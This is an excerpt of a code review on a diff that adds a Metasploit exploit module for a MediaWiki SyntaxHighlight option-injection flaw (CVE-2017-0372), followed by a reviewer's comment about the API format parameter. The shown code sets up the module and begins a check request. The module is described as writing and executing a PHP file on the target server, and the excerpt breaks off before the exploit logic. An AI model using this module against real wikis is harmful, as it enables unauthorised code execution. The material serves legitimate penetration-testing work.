modules/exploits/multi/http/mediawiki_syntaxhighlight.rb

```diff
@@ -0,0 +1,157 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = GoodRanking
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name' => 'MediaWiki SyntaxHighlight extension option injection vulnerability',
+      'Description'    => %q{
+        This module exploits an option injection vulnerability in the SyntaxHighlight
+        extension of MediaWiki. It tries to create & execute a PHP file in the document root.
+        The USERNAME & PASSWORD options are only needed if the Wiki is configured as private.
+      },
+      'Author' => 'Yorick Koster',
+      'License' => MSF_LICENSE,
+      'Platform' => 'php',
+      'Payload' => { 'BadChars' => "\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f ,'\"" } ,
+      'References' =>
+        [
+          [ 'CVE', '2017-0372' ],
+          [ 'URL', 'https://lists.wikimedia.org/pipermail/mediawiki-announce/2017-April/000207.html' ],
+          [ 'URL', 'https://phabricator.wikimedia.org/T158689' ],
+          [ 'URL', 'https://securify.nl/advisory/SFY20170201/syntaxhighlight_mediawiki_extension_allows_injection_of_arbitrary_pygments_options.html' ]
+        ],
+      'Arch' => ARCH_PHP,
+      'Targets' =>
+        [
+          ['Automatic Targeting', { 'auto' => true }  ],
+        ],
+      'DefaultTarget' => 0,
+      'DisclosureDate' => 'Apr 06 2017'))
+
+    register_options(
+      [
+        OptString.new('TARGETURI', [ true, "MediaWiki base path (eg, /w, /wiki, /mediawiki)", '/wiki' ]),
+        OptString.new('UPLOADPATH', [ true, "Relative local upload path", 'images' ]),
+        OptString.new('USERNAME', [ false, "Username to authenticate with", '' ]),
+        OptString.new('PASSWORD', [ false, "Password to authenticate with", '' ]),
+        OptBool.new('CLEANUP', [ false, "Delete created PHP file?", true ])
+      ])
+  end
+
+  def check
+    res = send_request_cgi({
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, 'api.php'),
+      'cookie' => @cookie,
+      'vars_post' => {
+        'action' => 'parse',
+        'format' => 'json',
```

Comment:
The format specifies the format the MediaWiki API returns, it is not the format of the POST. In this case it is just an urlencoded POST